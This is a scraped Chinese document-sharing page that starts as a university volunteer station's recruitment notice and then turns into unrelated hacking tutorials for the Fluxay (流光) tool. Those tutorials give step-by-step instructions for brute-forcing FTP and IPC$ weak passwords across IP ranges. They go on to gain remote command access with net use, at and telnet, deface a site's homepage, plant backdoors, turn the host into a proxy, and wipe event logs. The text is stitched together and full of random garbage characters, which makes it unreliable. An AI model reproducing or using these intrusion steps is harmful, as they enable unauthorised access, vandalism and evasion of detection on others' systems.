迎新宣传.docx

迎新宣传.docx

《迎新宣传.docx》由会员分享，可在线阅读，更多相关《迎新宣传.docx（17页珍藏版）》请在冰豆网上搜索。

迎新宣传

电气与信息学院志愿者服务站从成立到现在共开展并参与各类志愿活动5200余项，累计参与人数3600余人，长期稳定参与的志愿者达1300人，累计志愿服务总时长34万2千小时。

现有注册志愿者1246人。

我站长期开展支教、助残、敬老慰问等品牌性的校外志愿活动，以及美化校园、扫雪、卫生清理等口碑性的校内志愿活动,服务项目累计共96项，学院内部参与人数超过总人数的93.4%。

服务站内定期开展志愿者队伍的综合素质培训与能力拓展项目，共培养出获得国家奖学金、各级别优秀志愿者等荣者574人。

更出色的完成了各类大型赛会的志愿服务,被外界誉为“人才的摇篮，赛会的宠儿”

电信学院志愿者服务站部门设置有四个部门分别是办公室、宣传部、拓展部、活动部。

各部门职能有：

办公室：

负责志愿者的档案管理；管理站内的各种活动物品，进行经费管理；负责平时站内活动的组织和人员调配。

宣传部：

为志愿者站举办的各类活动进行宣传；了解志愿者网络动态，搭建与学校和社会之间的网络平台。

拓展部：

针对本站所开展的各类活动进行策划；负责大型活动中文艺节目的编排；组织各届广大志愿者开展座谈会。

活动部：

组织志愿者参加我站各常规志愿服务活动；组织在服务基地的各类联欢活动。

我站长期服务项目有伍连德小学支教，圣奇敬老院助老爱老、残障儿童帮扶活动，特色项目有：

由中央财政支持的社会组织示范的希望工程主题项目“星光行动”，由中国扶贫基金会发起，各高校积极效应的的“善行一百”为山区贫困儿童爱心捐助活动，哈尔滨国际贸易经济洽谈会。

近期，我站志愿者还开展了以“唤醒沉睡在箱底的爱心”为主题的捐衣献爱心活动，“携手残障儿童，共享美好时光”的残联爱心“班对一”爱心帮扶活动，并且担任了ACM国际大学生程序设计竞赛的承办志愿组织。

在长期的坚持与努力下，我站不但得到了各类东北农业大学优秀志愿团队的称号，还荣获了哈尔滨市“第八届优秀志愿服务集体”，广受各界好评。

刚刚离开温暖巢穴的大学生都是羽翼尚未丰满的雏鹰，迫不及待地想回馈社会。

也许曾经的你很想帮助他人，却未曾付诸实践；也许曾经的你也受过他人的帮助，却来不及报答。

点点星光，能够照亮夜空；涓涓细流，足以汇成大海。

一个温暖的拥抱，一个亲切地问候，足以抚平他们的弱小的心灵。

他们需要你的帮助，我们需要你的加入。

电信志愿者服务站欢迎你的到来！

电信志愿者服务站

流光教程

流光教程一_O_N,Z$G*^m*U

许多新人在用流光的时候不知道如何下手，小榕论坛来讨论的也多是“如何添加用户”这样的初级问题：

），就抽了点时间写这个简单的教程,希望让新手快速入门。

$X_n3lE&eM'f_l7I

_h4r3|）V"S&y

我个人认为流光的破解可分为5大部分：

#?

_c"J4l'uL;M_u_m

n_Z_X'v_d;E3D4{+A6g一、POP3/FTP/…探测

_YDZ"A_w9e

_Nz*l6A8n_u_x_j_A_Z二、IPC探测

+v8}]2iXr3{_V_~7c_N_NZ_i:

W2u

三、SQL探测

0b*[1x8g'U#}_?

_?

_}8H_x8O

四、高级扫描4v_`_I'\D_\Z

_?

_\）r+x!

e-q）jb_f

五、其它…9F_Z%J-t_E6c（}+N8v

_QH_^_@4V_X'p因为开发时间的原因，上面的探测模式略有不同，所以分成了四个部分，本教程说的是第一个部分的探测。

后面的探测模式应该属于流光的高级应用了：

）Z:

X%?

#a+yA&V

6J_Ov+]f9j_S,mx下面我就简单说一下基本的破解流程：

$~_S@_O%r2D

_z_|+|）q_s_qB_C1、你得有流光，我这里试验用的是流光2001.FORWin98中文版.FORWin2000的也可以。

_n_Q4]_v-A_z9N_C_D*_7G

Qa:

x7c.K_f4u首次启动流光，看到如下图的界面：

:

x2jW_r0n_J+x

"d）z_k_P!

\h$a_]_|&Q0ur_o

_X-U9[_z_O"k;M

首次使用是要注册的，不过不要想到花钱：

），小榕只是想看看有多少人用他的流光而已。

你可以填好相应的选项，然后点发送即可，如果发送失败，你把发送服务器换个就好了。

1D_y*^7C_M4y4j_j7B_A）[_s_R_p_a7_/w

_S;Xj_@___H

_E+U4x_t_R:

@5EY_t/C_J）}

因为重装系统，我也不知道我发了多少次了：

（。

如果不想注册，就稍等下面的进度条走完，点稍后即可。

如上图：

y\_B_s9N_p9~9f%O_l_`9FF5O_GX-X_?

3c_@_U9L

t_N;F_Q_D_g_H-x-s（Z5w5F_Er@_p_[

H9e_d$^"N_[*P"X.A$}

V_t_x6q2s_J

2、找个站点，我选的是中华网[url][/url]的主页空间（），探测方式：

FTP。

_N|_B_^_F_k4Y+IV+Xlf

有人常问扫描端口有什么用，其实作用就是你知道他提供了什么服务，然后可以采取相应的探测方式来获得PASS了：

）我们知道主页几乎都用的FTP上传，我们这次就用来测试一堆用户名，看看有没有弱智的密码，呵呵，如果有这样的，也不妨霸占为己有：

）

4n9NO_n_qZk_d

7WN_m_E_Q5Z_H_w3、加入要破解的站点名称：

右键单击FTP主机→编辑→添加→输入→确定！

_\:

]BE'M_G_w

m_Z_y9y_F:

qp_E8Ke_J5L!

Ia#C4I1O*w

_y_U&C_X#X$x,r

C_r_NA_p

!

z_S,@_}0m/P,V7}4、加入用户名：

我们要破解的是一堆用户名，所以要加入用户名的列表文件！

我们就加入流光目录下的Name.dic：

）右键单击刚才添加的主机：

→编辑→从列表中添加→Name.dic→打开

;g$d.kH-W5i_t_XR_H_u%?

8G

7__b_v_g'f_U

_C&@2HW,]_SN_O%y_O_w-Y.\*Exh_J_k_B6l

1l;v0{_`!

~_d+e%h

Uu

然后会有“用户已存在列表中”的提示，我们选中“不再提示”→确定。

如下图：

6A~:

u_uX3eh

$G7Z%~n_w

_w_V_F5^_tB#y_T#k%N_f7c

_C_kj_R-X_[___@-b用户名太多，我们可以用点主机前面的“—”号把用户列表缩起来，如下图：

+l3^8T_C0R3M_l

7Q,FPo_e_`"[_m_kZ-m1x^_k_B8j$E_j

]

!

V8Wo_C_E

r

大家注意名字前面的小框中必须有√要是没有就无法探测了。

X_c_j）[P_R

\

J_L,X5WC_vL_vo3G

5、有了用户名，我们就可以进行探测了，大家会想到怎么不用密码？

其实流光有个简单模式的探测，也就是用内置的密码”：

“123456”和“用户名”来进行探测，因为这样的密码是使用频率最高的：

）9r）?

_eb;M4Y5y#p_i

x_y

_{_MJ

r_O#j_@_H_m_g__当然你可以修改这个简单模式的文件，加入你认为弱智的密码。

方法是：

单击工具菜单→模式文件设定→简单模式探测设置文件→加入你要加入的密码→把设置文件存盘！

_O_Q_h_I_^,O

_FQ___~.kO_D_I下面我们就来看看这一堆名字里面有多少是用“123456”和“自己名字”来作为密码的。

_}_S~5M_{）E

_E_b_U_zR_q_H

Z探测→简单模式探测！

u$b'n（j_R,I_k0h_@

_b（P*|_@-s,U!

P;u_O.{_h_m.T2l*t_},|

_T]_q&I2q_~

3F__（W（Cj_?

_\

_Ms+qO3L$s探测中…

:

f_J+A;T_@_S_}&u

_y+g.B_lC-_6x"U_@X+M1]_B

$k.S*q!

g.]X

_K]_e/y^_I_i

:

]^_Y_E/A$f_B#W

1M+]_t+e_WQ_A_M6、探测完毕，也看到结果了，流光会问我们是否查看入侵检测报告，不想看可以选否。

*s_Q!

c_R:

C'o_m_s

;wI_`&x+y

_|_I）v_h7?

_x_c_|

;H_g_a+B5r:

v_t#J_e报告的画面

2z）S"n_S@_l4~#V_M

_y_d_x!

w*Ob_|_{_?

_Cb1ZD_Z

_\.ic_`_hx_c7、如果要探测的是一个用户名，就需要添加字典、或者密码方案。

方法是：

右键单击解码字典或方案→编辑→添加→选择一个密码档即可。

_]_}_E5?

Jl/@

_J$`

`

I_O#R3i以上就是流光的一次简单的探测了，事实上这些功能只能算是流光的2.5版的功能，流光2001增加的IPC/SQL/高级扫描等功能，使流光更加强大。

如果你对这个已经很熟悉了，相信你看流光的HELP就会很快的学会其它的使用方法的。

9\_WiR-J_U_V_j{Lk/X|

关于用户名的问题：

有人觉得自己加入的用户名不一定存在，如果不存在岂不是白费了力气？

这点你大可以放心，流光会进行验证的。

而且现在注册的用户入数之多，想个没有的名字都难，不信你随便敲个试试。

_Vi_~_P_L_Wd_YU_Y_k5@_O_u

关于字典的问题：

流光可以使用字典方案来探测，当然你也可以生成字典，有的新手在作练习的时候不知道怎么做，你也可以用记事本生成，每行输入一个密码，存盘后将扩展名改称.DIC，流光就认出来了：

）如果你连扩展名都不会改：

（那……

_w_p-w7J"G_a）\_a_f+p

_L/\D_i/`_@_yX#c

2a2H_~/f9W_[,L_or@_mF~

只要是学习、谁都会遇到困难，我也是问题多多，还得向小榕、EKIN讨教，欢迎大家多交流：

）

]_J+|3{,m

J-k#j!

M

0WH%X$s_p/@a

_u3I4L%S9nb_t_d

_P#m）Z_q_s

_`1__s"W）B_D:

c"{_n__&r_]

待续……

香烟2007-5-2811:

07

流光教程二

很长时间也没有写什么东西了，这源于我的懒惰和生活缺乏激情。

我的记事本上一大篇都是欠朋友的承诺：

（

_lP8M"F5M:

b2|0k!

J:

I_x_~_Rh

你既然看到这儿了，就在听我牢骚几句吧：

）搞安全应该有正确的心态，别以为你会了个工具使用就可以一步登天。

{_B\_[y0x\/u'a+gaS）t_U_c

交流、学习才是最重要的，把自己心态放正，无论我们是高还是低。

Rp4O）Z'q_T#Ln.W_xu3Z_k0x

5FiG_X!

x

J_L+Z#`_d_N

今天要写的是流光的IPC探测：

\,`;P___`_?

_E_vbn+j_q一、目的和任务：

+@&g2B_s/d_p+i

_MU_A0P_@O;tp_u!

?

_D_P

1、用流光的IPC探测获得一台NT主机的管理权限，并将这台主机做成一个跳板/代理。

_V|_n_n_P;__g_T_X_]2、学习IPC探测的相关知识。

!

g_n_aW4v,Ft9~4X-R0J'U:

\|

t_d

二、探测流程：

_E_],@9y/bB_m#a_~S8H_D#?

%X

1、你得有流光，我这里试验用的是流光2001.FORWin2000中文版。

FORWin98的不可以。

因为IPC连接功能是NT/

_X.Q#m_G"V_j_^_S}+T!

J（U:

s,o_|_P1F_\_I2p

2000提供的功能。

而且流光FOR2K要求你的操作系统得是NT/2000，否则流光启动会失败！

+D_f_do_X;}）J（~_\_Q.`v\&|7\3o

什么是IPC：

_l2E6WK0@4b_^

_d,d-T_x_k_r_x!

m_i_L_MIPC是指"InterProcessCommunications",准确的说是ipc$，是默认的在系统启动时的admin共享。

.pg_s_hY___E

_S#M+Y+c_^+\__|

IPC$是WindowsNT/2K中特有的远程网络登陆功能，它的特点是在同一时间内，两个IP之间只允许建立一个连接。

（n_V6s7f4k

R_Eu*@!

T注意，你试图通过IPC$连接会在EventLog中留下记录。

不管你是否登录成功。

_g/?

"o_[;W_eAv_Ew

2\"D,R+t6u;z$se5m_P6@_^5v7t

:

s#n8[_q4r_Ag

可不可以通过IPC$暴力破解密码？

当然可以！

不过，是不是太笨了点…

#p"U_`9F9v8l_v,P

_x_K8X$r_Am_k_{8K*G7q5R

2、首次启动流光，会看到注册的画面，具体操作请参考本人第一篇教程。

我们在主页面上可以有几种方法来通过IPC

_s_I）[_a_t

_M9l_y3tp探测获得管理的权限。

这里我们要作的是得到一台跳板，那么就可以用命中率高的办法来探测了（测试一堆IP来得_A:

q6E_k_B5__v

_n_L_a5Q*p_x_L

到弱口令）。

"S_[;h_r4]_W）@

9Q$?

5X4w（a在主界面选择探测→探测POP3/FTP/NT/SQL主机选项，或者直接按Ctrl+R。

_u~]_`W6C图main14H%S_m_Pu3`-g

7\0v7S7S_^_u_e

+k.h_]7}_v_r4A*|"B_^;X_K_Z0L;R"_-H

图main2Q_m

m_L_h7G_V

-X_C_q2S_~c_Q

_E

G"m_i_T_g_i+u

6N5__V_p!

Y0@_w_s0r,E3、出先了上面的小窗口，输入我们要破解的IP段，我们输入了来看看。

图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。

因为我们只想获得IPC弱口令，这样可以加快扫描的速度：

）填入IP，选择扫描NT/98主机k3P.gQ$p

.Z_AF#wX4、探测中……（start1）%_,sn#G;q3Y_`

!

G_v_?

_@_G;t0|1t___D

（注意如果你要探测的是流光保留的国内的IP段，会被禁止的，也就是探测的时候信息栏出现"IP保留"的字样）6r_b2Z_L_n9n'?

3F

M.K_oJ2c

!

dn_P6m_e;D%C_i_C_B_t）h_v_s!

b_m）v

6e（J_m_n_e_R5、这是扫描到的NT/98主机列表：

（jg1）9y_dR9V@_cEG

4zz_C1K_n9GO_P?

1s_a_

WO_m9l

'U0x_?

_Umk^2G5j

6、没有扫描到常用密码：

（

2\"r'i'k_A&n;o6K_gO_R_I"yt_}-T$J

_Hf_e_g_Sjc,o9v*L_Q）K:

F

7、就不要查看报告了：

…&e2N（Ki,t\&W_M_@_F_O

}z'p-S%y_Y_u4W

W_U9g.__w/S5A

\:

k_r__8_7g_A）A8、有了不少NT/98的机器了，正式开始IPC$探测：

IPC$主机－探测－探测所有IPC$用户列表。

$P8E_]3\9BK2p_g

A_P#[（NW5P4Y

%n）Th9q_O&[_k"U3yPXe

）g2t_M"l-^）A.s8N_}9、注意下面两个对话框的设置：

全选上，我们只要IPC$管理员的弱口令。

然后点选项

_Yi:

~_C_{_DP_Nz_y__x3w_xL

（C0M4XW_@_v_O

"m_x-?

_q_z_]%n4z10、点“选项”：

为了加快弱口令扫描速度，这里的两个我们可以全部取消，比如下面的那个，如果对方禁止列出用户了，我想对于一个网管来说，弱口令可能性也是微乎其微。

_T1@+Z_\_q_'x_b_U

3U+n）L1?

1Z_H_E0E

_?

_]*\9K5\6{4o2{3al8__W

-~_K+d6^_]%wm_gx1_f_w_[

11、探测中……

_L_|9Wl/`9i!

w

i_X5~o5y"EC+@/l8f#O

x_W:

@_Q

_F_L_?

_H_Kg/v_Q

12、有密码了：

）_vh3t_v/z_l_l,p

x_m;{Zr+L3{_~"k

_y1p_g2xlz:

P_l（f6y2[2v_S_Y;K,]

13、又出现了查看报告的窗口，看看：

）

#Y0Uf_HM_@,@_T_fx

_@_^%Z0v（t[_|9m-`）X-P（Q#o,I

_C8E[,FW

14、有远程主机的管理密码了，我们剩下的就是想办法控制它了，有什么好办法么？

：

）有的是！

自己看看工具－i:

h0{（A_G_C_O5O

H.j+f!

X;F_p8o菜单下的IIS远程命令:

）是不是很简单呢，我以后在说，今天还是先练习net命令吧。

_}6P_b\+uW#C%V%`*@$m*u"pH&P

15、黑了他！

_w2K#c_u"e_}

_@2]*w5d.Y+V'D8b_B开个dosprompt执行如下命令，本次用的例子如下图。

1v'k_e_P_X4a-r

）z9N,s5h_b-A_a_H__1、netusefile:

//对方ip/ipc$"密码"/user:

"用户名"||建立远程连接

6s_B_d

D1z3lp#T（o___p5v_e+P

SqC

2、copyicmd.exefile:

//对方ip/admin$||admin$是对方的winnt目录：

）这里文件多。

*Q1T*l,e"K%_/E

-P

r:

z%m_O_n/L3、nettimefile:

//对方IP/||看看对方的本地时间

{7J_{H.|:

f!

o_yQ_\_M

_Rg;Y_i_}_x+t_O1j&_4、atfile:

//对方ip/启动程序的时间启动程序名启动程序的参数||用at命令来定时启动程序，在这里我们用soon这个程序来做也可以，它可以取代3/4两步。

_LuwU_B_@）L2~_f_yS0@l_z

5、telnet对方ip端口||1Q&LR1Z3W/h}

_{_K9xJ4s-U（K%C-_*c

6、输入pass（如果不是用icmd.exe，或者没有设置口令就不用了）||

8H_v3k_?

）u_m1o_@_~_`_[_Q_F_@_G_~%g_Z8j_F

7、在开个窗口，继续copy我们用的东西。

copysock.execopyntlm.execopycl.execlear.exe1p"?

+X1L_N$K_~4k

z_a1\5E_[:

?

:

j5f

图cmd1

-M_R_g_W,~_F/cx

_q_\&V_h|,P#o&n8N/R_`l%R_B

9O2i,Z_Z~/~,bk_A%c4f-h!

vQ图cmd2

N_l#I_\*sEV

U_iH_R"C%X

;L;\#~_A-g_]）_$o

_Z（G;i_i_C如果我们真的想黑了他，只需要把我们的首页文件覆盖目标的首页就ok了，我们可以通过dir/sdefault.htm或者dir/sindex.htm来确定对方首页的为止，一般是在X:

\interpub\wwwroot\.

%\_Y_U_s_C5z2t_h2w_j2W_w_P_s*C:

@

假如首页文件是default.htm并且在c:

\interpub\wwwroot，这样:

copydefault.htm\\ip\c$\interpub\wwwroot_n_{*{_]4W0F4W#M

___s8c8P_\_BK

下面的图有演示t2~5l:

i'v,j

.T'l!

h）X_G_K__-F_N_^7、其实黑人家是很低级并且没意思的：

（，我们最好是物有所有，作成跳板吧，今后干活方便点：

）/S.S,__?

^"L-y

F&D（H_L^执行我们copy过去的ntlm.exe，取消验正。

在给自己留个后门，比如提升guest的权限，或者其它的后门工具，这类东西多了自己选吧，看看杀手copy的那堆东西：

）

_G_k,Q

@X"n_\_mu_sE

_}^

\_W（aGV,S

Y1a_Uj9t^/n_[7K

6Z_`!

q!

D_x-W\8、做个SOCK5代理玩玩，用在QQ上不错喔：

_c_q&Q`_k+h8m

1G1}_l_X'S（F

执行我们copy过去的sock-install，netstartskserver看看用在QQ上的效果：

）

1C.P7F6?

"mY

_[7D&n&l_|

@

*bwh?

_}1O/S_W

0s（r2G:

K9__A_\_k_B/i_w是不是没有看清上面的步骤呢？

_\$u1L_l_]_q_J,\Q（e

1Q_G2S/z_q4_0D_Kw_N下面是我telnet上去后所有的命令：

）

M）Mk_|.Z$m_e*b_Z

R_Z_r

0c0Z_w8X7}_I

$p_Fg1^.A9、还能做成其他的么？

_y_L_P4s#w"\5i4|

/}2}_H6h!

j_c/|_o;A

当然了，只要你有时间，并且愿意做，我曾经偷偷的把自己的主页放到人家的server上，速度快、空间无限，嘿嘿：

）

_A&b!

W2`_M_y^#v

5L_j_}O_`_q_G10、日志清除，断开连接：

_dB#V_aF~_wf

"x）O_p（r_[_`9D

执行我们copy过去的cl.execlear.exe都可以清除日志，比如clearall：

清除所有的日志。

然后在断开连接：

netusefile:

//ip/ipc$/delete

_F_N_w_L3v

4J$l_x'X_z_t_p这步我认为是必需的，尤其是在一些有争议的站点上，或者是国内的站点，除非你想让电视上报导XXX地区我神勇刑警捕获弱智黑客一名XXX。

'r_KI_h8GV（V

$F&t_j+\_W6f

在网吧写完：

（错误之处请赐教。

f_^#B#y_g3uJ#q

&u;Y/q_~3h_NA_~只要是学习、谁都会遇到困难，我也是问题多多，还得向小榕、EKIN讨教，欢迎大家多交流：

）

香烟2007-5-2811:

08

流光教程三

关于IPC$的终于写完了，那个该死的网吧，闹哄哄的声音声